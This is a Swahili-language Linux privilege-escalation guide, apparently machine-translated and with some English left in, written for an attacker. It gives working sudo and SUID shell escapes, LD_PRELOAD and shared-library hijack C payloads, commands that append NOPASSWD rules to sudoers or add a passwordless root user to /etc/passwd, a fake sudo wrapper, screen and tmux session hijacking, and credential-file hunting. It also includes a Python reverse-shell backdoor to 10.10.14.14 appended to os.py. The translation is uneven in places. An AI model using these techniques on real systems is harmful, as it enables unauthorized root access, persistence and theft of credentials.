Unaweza kuruhusiwa kutekeleza amri fulani kwa kutumia sudo au zinaweza kuwa na bit ya suid. Angalia kwa kutumia:

sudo -l #Check commands you can execute with sudo
find / -perm -4000 2>/dev/null #Find all SUID binaries

Baadhi ya amri zisizotarajiwa zinakuwezesha kusoma na/au kuandika faili au hata kutekeleza amri. Kwa mfano:

sudo awk 'BEGIN {system("/bin/sh")}'
sudo find /etc -exec sh -i \;
sudo tcpdump -n -i lo -G1 -w /dev/null -z ./runme.sh
sudo tar c a.tar -I ./runme.sh a
ftp>!/bin/sh
less>! <shell_comand>

NOPASSWD

Mkonfigu wa Sudo unaweza kumruhusu mtumiaji kutekeleza amri fulani kwa kutumia haki za mtumiaji mwingine bila kujua nenosiri.

$ sudo -l
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/vim

Katika mfano huu, mtumiaji demo anaweza kukimbia vim kama root, sasa ni rahisi kupata shell kwa kuongeza ufunguo wa ssh kwenye saraka ya root au kwa kuita sh.

sudo vim -c '!sh'

SETENV

Hii amri inamruhusu mtumiaji kuweka mabadiliko ya mazingira wakati wa kutekeleza kitu:

$ sudo -l
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh

Hii mfano, imejengwa kwenye mashine ya HTB Admirer, ilikuwa na udhaifu wa PYTHONPATH hijacking ili kupakia maktaba ya python isiyo na mipaka wakati wa kutekeleza skripti kama root:

sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh

Sudo execution bypassing paths

Ruka kusoma faili nyingine au tumia symlinks. Kwa mfano katika faili ya sudoers: hacker10 ALL= (root) /bin/less /var/log/*

sudo less /var/logs/anything
less>:e /etc/shadow #Jump to read other files using privileged less

ln /etc/shadow /var/log/new
sudo less /var/log/new #Use symlinks to read any file

Ikiwa wildcard inatumika (*), ni rahisi zaidi:

sudo less /var/log/../../etc/shadow #Read shadow
sudo less /var/log/something /etc/shadow #Red 2 files

Countermeasures: https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/

Amri ya Sudo/SUID binary bila njia ya amri

Ikiwa idhini ya sudo imetolewa kwa amri moja bila kubainisha njia: hacker10 ALL= (root) less unaweza kuitumia kwa kubadilisha mabadiliko ya PATH

export PATH=/tmp:$PATH
#Put your backdoor in /tmp and name it "less"
sudo less

Hii mbinu inaweza pia kutumika ikiwa suid binary inaendesha amri nyingine bila kubainisha njia yake (daima angalia na strings maudhui ya SUID binary isiyo ya kawaida).

Payload examples to execute.

SUID binary yenye njia ya amri

Ikiwa suid binary inaendesha amri nyingine ikibainisha njia, basi, unaweza kujaribu kutoa kazi iliyo na jina kama amri ambayo faili la suid linaita.

Kwa mfano, ikiwa binary ya suid inaita /usr/sbin/service apache2 start unapaswa kujaribu kuunda kazi hiyo na kuisafirisha:

function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service

Then, when you call the suid binary, this function will be executed

LD_PRELOAD & LD_LIBRARY_PATH

The LD_PRELOAD environment variable is used to specify one or more shared libraries (.so files) to be loaded by the loader before all others, including the standard C library (libc.so). This process is known as preloading a library.

However, to maintain system security and prevent this feature from being exploited, particularly with suid/sgid executables, the system enforces certain conditions:

The loader disregards LD_PRELOAD for executables where the real user ID (ruid) does not match the effective user ID (euid).
For executables with suid/sgid, only libraries in standard paths that are also suid/sgid are preloaded.

Privilege escalation can occur if you have the ability to execute commands with sudo and the output of sudo -l includes the statement env_keep+=LD_PRELOAD. This configuration allows the LD_PRELOAD environment variable to persist and be recognized even when commands are run with sudo, potentially leading to the execution of arbitrary code with elevated privileges.

Defaults        env_keep += LD_PRELOAD

Hifadhi kama /tmp/pe.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

Kisha jenga kwa kutumia:

cd /tmp
gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Hatimaye, escalate privileges running

sudo LD_PRELOAD=./pe.so <COMMAND> #Use any command you can run with sudo

Privesc kama hii inaweza kutumika vibaya ikiwa mshambuliaji anadhibiti LD_LIBRARY_PATH env variable kwa sababu anadhibiti njia ambapo maktaba zitatafutwa.

#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}

# Compile & execute
cd /tmp
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp <COMMAND>

SUID Binary – .so injection

Wakati wa kukutana na binary yenye ruhusa za SUID ambayo inaonekana isiyo ya kawaida, ni mazoea mazuri kuthibitisha ikiwa inapakua faili za .so ipasavyo. Hii inaweza kuangaliwa kwa kuendesha amri ifuatayo:

strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"

Kwa mfano, kukutana na kosa kama "open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (Hakuna faili au directory kama hiyo)" kunapendekeza uwezekano wa unyakuzi.

Ili kutumia hii, mtu angeendelea kwa kuunda faili la C, sema "/path/to/.config/libcalc.c", lililo na msimbo ufuatao:

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject(){
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

Hii code, mara tu inapokusanywa na kutekelezwa, inalenga kuinua mamlaka kwa kubadilisha ruhusa za faili na kutekeleza shell yenye mamlaka yaliyoimarishwa.

Kusanya faili ya C hapo juu kuwa faili ya kitu kilichoshirikiwa (.so) na:

gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c

Hatimaye, kuendesha SUID binary iliyoathiriwa inapaswa kuanzisha exploit, ikiruhusu uwezekano wa kuathiri mfumo.

Shared Object Hijacking

# Lets find a SUID using a non-standard library
ldd some_suid
something.so => /lib/x86_64-linux-gnu/something.so

# The SUID also loads libraries from a custom location where we can write
readelf -d payroll  | grep PATH
0x000000000000001d (RUNPATH)            Library runpath: [/development]

Sasa kwamba tumepata binary ya SUID inayopakia maktaba kutoka kwa folda ambapo tunaweza kuandika, hebu tuunde maktaba katika folda hiyo kwa jina linalohitajika:

//gcc src.c -fPIC -shared -o /development/libshared.so
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
setresuid(0,0,0);
system("/bin/bash -p");
}

Ikiwa unapata kosa kama

./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name

hii inamaanisha kwamba maktaba uliyounda inahitaji kuwa na kazi inayoitwa a_function_name.

GTFOBins

GTFOBins ni orodha iliyochaguliwa ya Unix binaries ambazo zinaweza kutumiwa na mshambuliaji ili kupita vizuizi vya usalama wa ndani. GTFOArgs ni sawa lakini kwa kesi ambapo unaweza tu kuingiza hoja katika amri.

Mradi huu unakusanya kazi halali za Unix binaries ambazo zinaweza kutumiwa vibaya kuvunja shell zilizozuiliwa, kupandisha au kudumisha haki za juu, kuhamasisha faili, kuanzisha shell za bind na reverse, na kuwezesha kazi nyingine za baada ya unyakuzi.

gdb -nx -ex '!sh' -ex quit sudo mysql -e '! /bin/sh' strace -o /dev/null /bin/sh sudo awk 'BEGIN {system("/bin/sh")}'

GTFOBins

GTFOArgs

FallOfSudo

Ikiwa unaweza kufikia sudo -l unaweza kutumia chombo FallOfSudo kuangalia ikiwa kinapata jinsi ya kutumia sheria yoyote ya sudo.

Reusing Sudo Tokens

Katika kesi ambapo una sudo access lakini si nenosiri, unaweza kupandisha haki kwa kusubiri utekelezaji wa amri ya sudo na kisha kuingilia kati token ya kikao.

Mahitaji ya kupandisha haki:

Tayari una shell kama mtumiaji "sampleuser"
"sampleuser" amekuwa ameitisha sudo kutekeleza kitu katika dakika 15 zilizopita (kwa kawaida hiyo ndiyo muda wa token ya sudo inayoturuhusu kutumia sudo bila kuingiza nenosiri lolote)
cat /proc/sys/kernel/yama/ptrace_scope ni 0
gdb inapatikana (unaweza kuweza kuipakia)

(Unaweza kuwezesha kwa muda ptrace_scope kwa echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope au kudumu kubadilisha /etc/sysctl.d/10-ptrace.conf na kuweka kernel.yama.ptrace_scope = 0)

Ikiwa mahitaji haya yote yanakidhi, unaweza kupandisha haki kwa kutumia: https://github.com/nongiach/sudo_inject

unyakuzi wa kwanza (exploit.sh) utaunda binary activate_sudo_token katika /tmp. Unaweza kuitumia kuamsha token ya sudo katika kikao chako (hutaweza kupata shell ya root moja kwa moja, fanya sudo su):

bash exploit.sh
/tmp/activate_sudo_token
sudo su

The second exploit (exploit_v2.sh) itaunda sh shell katika /tmp iliyomilikiwa na root yenye setuid

bash exploit_v2.sh
/tmp/sh -p

The third exploit (exploit_v3.sh) itaunda faili la sudoers ambalo linafanya tokens za sudo kuwa za milele na kuruhusu watumiaji wote kutumia sudo

bash exploit_v3.sh
sudo su

/var/run/sudo/ts/<Username>

Ikiwa una idhini za kuandika katika folda au kwenye faili zozote zilizoundwa ndani ya folda hiyo unaweza kutumia binary write_sudo_token ili kuunda token ya sudo kwa mtumiaji na PID. Kwa mfano, ikiwa unaweza kufuta faili /var/run/sudo/ts/sampleuser na una shell kama mtumiaji huyo mwenye PID 1234, unaweza kupata haki za sudo bila kuhitaji kujua nenosiri kwa kufanya:

./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser

/etc/sudoers, /etc/sudoers.d

Faili /etc/sudoers na faili ndani ya /etc/sudoers.d zinaelekeza ni nani anaweza kutumia sudo na jinsi gani. Faili hizi kwa kawaida zinaweza kusomwa tu na mtumiaji root na kundi root. Ikiwa unaweza kusoma faili hii unaweza kuwa na uwezo wa kupata taarifa za kuvutia, na ikiwa unaweza kuandika faili yoyote utaweza kuinua mamlaka.

ls -l /etc/sudoers /etc/sudoers.d/
ls -ld /etc/sudoers.d/

Ikiwa unaweza kuandika unaweza kutumia vibaya ruhusa hii

echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README

Njia nyingine ya kutumia vibaya ruhusa hizi:

# makes it so every terminal can sudo
echo "Defaults !tty_tickets" > /etc/sudoers.d/win
# makes it so sudo never times out
echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win

DOAS

Kuna baadhi ya mbadala wa sudo binary kama doas kwa OpenBSD, kumbuka kuangalia usanidi wake kwenye /etc/doas.conf

permit nopass demo as root cmd vim

Sudo Hijacking

Ikiwa unajua kwamba mtumiaji kwa kawaida anajiunga na mashine na anatumia sudo kuongeza mamlaka na umepata shell ndani ya muktadha wa mtumiaji huyo, unaweza kuunda executable mpya ya sudo ambayo itatekeleza msimbo wako kama root na kisha amri ya mtumiaji. Kisha, badilisha $PATH wa muktadha wa mtumiaji (kwa mfano kuongeza njia mpya katika .bash_profile) ili wakati mtumiaji anatekeleza sudo, executable yako ya sudo itatekelezwa.

Kumbuka kwamba ikiwa mtumiaji anatumia shell tofauti (sio bash) utahitaji kubadilisha faili nyingine kuongeza njia mpya. Kwa mfano sudo-piggyback inabadilisha ~/.bashrc, ~/.zshrc, ~/.bash_profile. Unaweza kupata mfano mwingine katika bashdoor.py

Au kuendesha kitu kama:

cat >/tmp/sudo <<EOF
#!/bin/bash
/usr/bin/sudo whoami > /tmp/privesc
/usr/bin/sudo "\$@"
EOF
chmod +x /tmp/sudo
echo ‘export PATH=/tmp:$PATH’ >> $HOME/.zshenv # or ".bashrc" or any other

# From the victim
zsh
echo $PATH
sudo ls

Shared Library

ld.so

Faili /etc/ld.so.conf inaonyesha mahali ambapo faili za usanidi zilizoloadiwa zinatoka. Kawaida, faili hii ina njia ifuatayo: include /etc/ld.so.conf.d/*.conf

Hii inamaanisha kwamba faili za usanidi kutoka /etc/ld.so.conf.d/*.conf zitasomwa. Faili hizi za usanidi zinaelekeza kwenye folda nyingine ambapo maktaba zitatafutwa. Kwa mfano, maudhui ya /etc/ld.so.conf.d/libc.conf ni /usr/local/lib. Hii inamaanisha kwamba mfumo utafuta maktaba ndani ya /usr/local/lib.

Ikiwa kwa sababu fulani mtumiaji ana ruhusa za kuandika kwenye yoyote ya njia zilizoonyeshwa: /etc/ld.so.conf, /etc/ld.so.conf.d/, faili yoyote ndani ya /etc/ld.so.conf.d/ au folda yoyote ndani ya faili ya usanidi ndani ya /etc/ld.so.conf.d/*.conf anaweza kuwa na uwezo wa kupandisha hadhi. Angalia jinsi ya kutumia makosa haya ya usanidi kwenye ukurasa ufuatao:

ld.so privesc exploit example

RPATH

level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"
0x00000001 (NEEDED)                     Shared library: [libc.so.6]
0x0000000f (RPATH)                      Library rpath: [/var/tmp/flag15]

level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 =>  (0x0068c000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x005bb000)

Kwa kunakili lib ndani ya /var/tmp/flag15/ itatumika na programu katika mahali hapa kama ilivyoainishwa katika mabadiliko ya RPATH.

level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/

level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 =>  (0x005b0000)
libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x00737000)

Kisha tengeneza maktaba mbaya katika /var/tmp na gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6

#include<stdlib.h>
#define SHELL "/bin/sh"

int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))
{
char *file = SHELL;
char *argv[] = {SHELL,0};
setresuid(geteuid(),geteuid(), geteuid());
execve(file,argv,0);
}

Uwezo

Uwezo wa Linux unatoa sehemu ya ruhusa za mizizi zinazopatikana kwa mchakato. Hii kwa ufanisi inavunja ruhusa za mizizi kuwa vitengo vidogo na tofauti. Kila moja ya vitengo hivi inaweza kisha kutolewa kwa mchakato kwa uhuru. Kwa njia hii, seti kamili ya ruhusa inapunguzwa, ikipunguza hatari za unyakuzi. Soma ukurasa ufuatao ili ujifunze zaidi kuhusu uwezo na jinsi ya kuyatumia vibaya:

Linux Capabilities

Ruhusa za Katalogi

Katika katalogi, bit ya "tekeleza" inaashiria kwamba mtumiaji anayehusika anaweza "cd" ndani ya folda. Bit ya "soma" inaashiria kwamba mtumiaji anaweza orodhesha faili, na bit ya "andika" inaashiria kwamba mtumiaji anaweza futa na unda faili mpya.

ACLs

Orodha za Udhibiti wa Ufikiaji (ACLs) zinawakilisha tabaka la pili la ruhusa za hiari, zenye uwezo wa kuzidi ruhusa za jadi za ugo/rwx. Ruhusa hizi zinaboresha udhibiti juu ya ufikiaji wa faili au katalogi kwa kuruhusu au kukataa haki kwa watumiaji maalum ambao si wamiliki au sehemu ya kundi. Kiwango hiki cha ukamilifu kinahakikisha usimamizi sahihi wa ufikiaji. Maelezo zaidi yanaweza kupatikana hapa.

Mpe mtumiaji "kali" ruhusa za kusoma na kuandika juu ya faili:

setfacl -m u:kali:rw file.txt
#Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included)

setfacl -b file.txt #Remove the ACL of the file

Pata faili zenye ACL maalum kutoka kwa mfumo:

getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null

Open shell sessions

Katika toleo za zamani unaweza kuchukua baadhi ya sehemu za mtumiaji tofauti (root). Katika toleo za hivi karibuni utaweza kuungana na sehemu za skrini tu za mtumiaji wako mwenyewe. Hata hivyo, unaweza kupata habari za kuvutia ndani ya sehemu.

screen sessions hijacking

Orodha ya sehemu za skrini

screen -ls
screen -ls <username>/ # Show another user' screen sessions

Unganisha kwenye kikao

screen -dr <session> #The -d is to detach whoever is attached to it
screen -dr 3350.foo #In the example of the image
screen -x [user]/[session id]

tmux sessions hijacking

Hii ilikuwa shida na matoleo ya zamani ya tmux. Sikuwa na uwezo wa kuingilia kikao cha tmux (v2.1) kilichoundwa na root kama mtumiaji asiye na mamlaka.

List tmux sessions

tmux ls
ps aux | grep tmux #Search for tmux consoles not using default folder for sockets
tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess

Unganisha kwenye kikao

tmux attach -t myname #If you write something in this session it will appears in the other opened one
tmux attach -d -t myname #First detach the session from the other console and then access it yourself

ls -la /tmp/dev_sess #Check who can access it
rw-rw---- 1 root devs 0 Sep  1 06:27 /tmp/dev_sess #In this case root and devs can
# If you are root or devs you can access it
tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket

Check Valentine box from HTB for an example.

SSH

Debian OpenSSL Predictable PRNG - CVE-2008-0166

Mfunguo wote wa SSL na SSH ulioanzishwa kwenye mifumo ya msingi ya Debian (Ubuntu, Kubuntu, nk) kati ya Septemba 2006 na Mei 13, 2008 unaweza kuathiriwa na hitilafu hii. Hitilafu hii inasababishwa wakati wa kuunda funguo mpya za ssh katika mifumo hiyo, kwani mabadiliko 32,768 pekee yalikuwa yanawezekana. Hii inamaanisha kwamba uwezekano wote unaweza kuhesabiwa na ikiwa una funguo ya umma ya ssh unaweza kutafuta funguo ya kibinafsi inayolingana. Unaweza kupata uwezekano uliohesabiwa hapa: https://github.com/g0tmi1k/debian-ssh

SSH Interesting configuration values

PasswordAuthentication: Inaelezea ikiwa uthibitishaji wa nenosiri unaruhusiwa. Kiwango cha kawaida ni no.
PubkeyAuthentication: Inaelezea ikiwa uthibitishaji wa funguo za umma unaruhusiwa. Kiwango cha kawaida ni yes.
PermitEmptyPasswords: Wakati uthibitishaji wa nenosiri unaruhusiwa, inaelezea ikiwa seva inaruhusu kuingia kwenye akaunti zenye nywila tupu. Kiwango cha kawaida ni no.

PermitRootLogin

Inaelezea ikiwa root anaweza kuingia kwa kutumia ssh, kiwango cha kawaida ni no. Thamani zinazowezekana:

yes: root anaweza kuingia kwa kutumia nenosiri na funguo ya kibinafsi
without-password au prohibit-password: root anaweza kuingia tu kwa funguo ya kibinafsi
forced-commands-only: Root anaweza kuingia tu kwa kutumia funguo ya kibinafsi na ikiwa chaguo za amri zimeelezwa
no : hapana

AuthorizedKeysFile

Inaelezea faili ambazo zinafunguo za umma ambazo zinaweza kutumika kwa uthibitishaji wa mtumiaji. Inaweza kuwa na alama kama %h, ambayo itabadilishwa na saraka ya nyumbani. Unaweza kuashiria njia za moja kwa moja (zinazoanzia /) au njia za kulinganisha kutoka nyumbani kwa mtumiaji. Kwa mfano:

AuthorizedKeysFile    .ssh/authorized_keys access

Iyo usanidi utaonyesha kwamba ikiwa unajaribu kuingia na funguo ya mtumiaji "testusername" ssh italinganisha funguo za umma za funguo zako na zile zilizoko katika /home/testusername/.ssh/authorized_keys na /home/testusername/access

ForwardAgent/AllowAgentForwarding

SSH agent forwarding inakuwezesha kutumia funguo zako za SSH za ndani badala ya kuacha funguo (bila nywila!) zikiwa kwenye seva yako. Hivyo, utaweza kuruka kupitia ssh kwenda mwenyeji na kutoka pale kuruka kwenda mwenyeji mwingine ukitumia funguo zilizoko kwenye mwenyeji wako wa awali.

Unahitaji kuweka chaguo hili katika $HOME/.ssh.config kama ifuatavyo:

Host example.com
ForwardAgent yes

Kumbuka kwamba ikiwa Host ni * kila wakati mtumiaji an跳a kwenye mashine tofauti, mwenyeji huyo atakuwa na uwezo wa kufikia funguo (ambayo ni suala la usalama).

Faili /etc/ssh_config inaweza kufuta hizi chaguzi na kuruhusu au kukataa usanidi huu. Faili /etc/sshd_config inaweza kuruhusu au kukataa ssh-agent forwarding kwa neno kuu AllowAgentForwarding (kawaida ni ruhusa).

Ikiwa unapata kwamba Forward Agent imewekwa katika mazingira, soma ukurasa ufuatao kama unaweza kuweza kuitumia vibaya ili kupandisha mamlaka:

SSH Forward Agent exploitation

Faili za Kuvutia

Faili za Profaili

Faili /etc/profile na faili zilizo chini ya /etc/profile.d/ ni scripts ambazo zinafanywa wakati mtumiaji anapokimbia shell mpya. Hivyo, ikiwa unaweza kuandika au kubadilisha yoyote kati yao unaweza kupandisha mamlaka.

ls -l /etc/profile /etc/profile.d/

Ikiwa kuna skripti za wasifu zisizo za kawaida, unapaswa kuzikagua kwa maelezo nyeti.

Faili za Passwd/Shadow

Kulingana na OS, faili za /etc/passwd na /etc/shadow zinaweza kuwa na jina tofauti au kuna nakala ya akiba. Kwa hivyo inashauriwa kupata zote na kuangalia kama unaweza kusoma ili kuona kama kuna hash ndani ya faili:

#Passwd equivalent files
cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
#Shadow equivalent files
cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null

Katika baadhi ya matukio unaweza kupata password hashes ndani ya faili ya /etc/passwd (au sawa na hiyo)

grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null

Writable /etc/passwd

Kwanza, tengeneza nenosiri kwa kutumia moja ya amri zifuatazo.

openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'

Kisha ongeza mtumiaji hacker na ongeza nenosiri lililotengenezwa.

hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash

E.g: hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash

Sasa unaweza kutumia amri ya su na hacker:hacker

Vinginevyo, unaweza kutumia mistari ifuatayo kuongeza mtumiaji wa dummy bila nenosiri. WARNING: unaweza kudhoofisha usalama wa sasa wa mashine.

echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy

NOTE: Katika majukwaa ya BSD, /etc/passwd iko kwenye /etc/pwd.db na /etc/master.passwd, pia /etc/shadow imepewa jina jipya kuwa /etc/spwd.db.

Unapaswa kuangalia kama unaweza kuandika katika baadhi ya faili nyeti. Kwa mfano, je, unaweza kuandika kwenye faili ya usanidi wa huduma?

find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody
for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user

Kwa mfano, ikiwa mashine inafanya kazi na tomcat server na unaweza kubadilisha faili ya usanidi wa huduma ya Tomcat ndani ya /etc/systemd/, basi unaweza kubadilisha mistari:

ExecStart=/path/to/backdoor
User=root
Group=root

Your backdoor will be executed the next time that tomcat is started.

Check Folders

The following folders may contain backups or interesting information: /tmp, /var/tmp, /var/backups, /var/mail, /var/spool/mail, /etc/exports, /root (Labda huwezi kusoma ya mwisho lakini jaribu)

ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root

Mahali ya Ajabu/Faida za Faili

#root owned files in /home folders
find /home -user root 2>/dev/null
#Files owned by other users in folders owned by me
for d in `find /var /etc /home /root /tmp /usr /opt /boot /sys -type d -user $(whoami) 2>/dev/null`; do find $d ! -user `whoami` -exec ls -l {} \; 2>/dev/null; done
#Files owned by root, readable by me but not world readable
find / -type f -user root ! -perm -o=r 2>/dev/null
#Files owned by me or world writable
find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
#Writable files by each group I belong to
for g in `groups`;
do printf "  Group $g:\n";
find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
done
done

Faili zilizobadilishwa katika dakika za mwisho

find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null

Faili za Sqlite DB

find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null

*_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml files

find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null

Faili yaliyofichwa

find / -type f -iname ".*" -ls 2>/dev/null

Script/Binaries katika PATH

for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done
for d in `echo $PATH | tr ":" "\n"`; do find $d -type f -executable 2>/dev/null; done

Faili za wavuti

ls -alhR /var/www/ 2>/dev/null
ls -alhR /srv/www/htdocs/ 2>/dev/null
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/ 2>/dev/null

Makaratasi ya Hifadhi

find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/null

Known files containing passwords

Soma msimbo wa linPEAS, inatafuta faili kadhaa zinazoweza kuwa na nywila. Chombo kingine cha kuvutia ambacho unaweza kutumia kufanya hivyo ni: LaZagne ambacho ni programu ya chanzo wazi inayotumika kupata nywila nyingi zilizohifadhiwa kwenye kompyuta ya ndani kwa Windows, Linux & Mac.

Logs

Ikiwa unaweza kusoma logi, huenda ukapata habari za kuvutia/za siri ndani yao. Kadri logi inavyokuwa ya ajabu, ndivyo itakavyokuwa ya kuvutia zaidi (labda). Pia, baadhi ya logi za audit zilizowekwa vibaya ("backdoored"?) zinaweza kukuruhusu kurekodi nywila ndani ya logi za audit kama ilivyoelezwa katika chapisho hili: https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/.

aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null

Ili kusoma kumbukumbu za kundi adm itakuwa ya msaada mkubwa.

Faili za Shell

~/.bash_profile # if it exists, read it once when you log in to the shell
~/.bash_login # if it exists, read it once if .bash_profile doesn't exist
~/.profile # if it exists, read once if the two above don't exist
/etc/profile # only read if none of the above exists
~/.bashrc # if it exists, read it every time you start a new shell
~/.bash_logout # if it exists, read when the login shell exits
~/.zlogin #zsh shell
~/.zshrc #zsh shell

Generic Creds Search/Regex

Unapaswa pia kuangalia faili zinazo na neno "password" katika jina lake au ndani ya maudhui, na pia kuangalia IPs na barua pepe ndani ya logi, au hashes regexps. Sitaorodhesha hapa jinsi ya kufanya yote haya lakini ikiwa unavutiwa unaweza kuangalia ukaguzi wa mwisho ambao linpeas unafanya.

Writable files

Python library hijacking

Ikiwa unajua kutoka wapi script ya python itatekelezwa na unaweza kuandika ndani ya folda hiyo au unaweza kubadilisha maktaba za python, unaweza kubadilisha maktaba ya OS na kuingiza backdoor (ikiwa unaweza kuandika mahali ambapo script ya python itatekelezwa, nakili na ubandike maktaba ya os.py).

Ili kuingiza backdoor kwenye maktaba ongeza tu kwenye mwisho wa maktaba ya os.py mistari ifuatayo (badilisha IP na PORT):

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Logrotate exploitation

Uthibitisho katika logrotate unawaruhusu watumiaji wenye idhini za kuandika kwenye faili la log au saraka zake za mzazi kupata haki za juu. Hii ni kwa sababu logrotate, mara nyingi ikikimbia kama root, inaweza kudhibitiwa ili kutekeleza faili zisizo za kawaida, hasa katika saraka kama /etc/bash_completion.d/. Ni muhimu kuangalia idhini si tu katika /var/log bali pia katika saraka yoyote ambapo mzunguko wa log unatumika.

Uthibitisho huu unahusisha logrotate toleo 3.18.0 na ya zamani

Taarifa zaidi kuhusu uthibitisho huu inaweza kupatikana kwenye ukurasa huu: https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition.

Unaweza kutumia uthibitisho huu na logrotten.

Uthibitisho huu ni sawa sana na CVE-2016-1247 (nginx logs), hivyo kila wakati unapata kuwa unaweza kubadilisha logs, angalia nani anasimamia hizo logs na angalia kama unaweza kupandisha haki kwa kubadilisha logs na symlinks.

/etc/sysconfig/network-scripts/ (Centos/Redhat)

Marejeo ya uthibitisho: https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f

Ikiwa, kwa sababu yoyote, mtumiaji anaweza kuandika script ya ifcf-<chochote> kwenye /etc/sysconfig/network-scripts au inaweza kurekebisha moja iliyopo, basi mfumo wako umepatikana.

Scripts za mtandao, ifcg-eth0 kwa mfano zinatumika kwa muunganisho wa mtandao. Zinatazama kama faili za .INI. Hata hivyo, zinachukuliwa ~sourced~ kwenye Linux na Network Manager (dispatcher.d).

